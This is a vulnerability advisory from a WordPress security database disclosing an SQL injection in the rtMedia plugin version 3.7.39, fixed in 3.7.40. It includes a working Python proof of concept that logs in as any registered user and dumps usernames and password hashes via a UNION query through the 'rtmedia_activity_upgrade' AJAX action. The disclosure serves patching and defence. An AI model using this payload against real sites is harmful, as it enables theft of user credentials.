rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, if the class ‘BuddyPress’ is available.

Once instantiated, the RTMediaActivityUpgrade class adds an AJAX method called ‘rtmedia_activity_upgrade’. This AJAX method is callable by any registered user, and is susceptible to MySQL Injection.
Proof of Concept
import requests,json
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
	"log":"test",
	"pwd":"test",
	"wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
	"action":"rtmedia_activity_upgrade",
	"last_id":"0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

print json.loads(r.text)['activity_id']

Affects

Plugin buddypress-media
fixed in version 3.7.40

References

URL https://research.g0blin.co.uk/g0blin-00046/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 270
Verified No
WPVDB ID 7950

Timeline

Publicly Published 2015-04-28 (over 1 year ago)
Added 2015-04-28 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.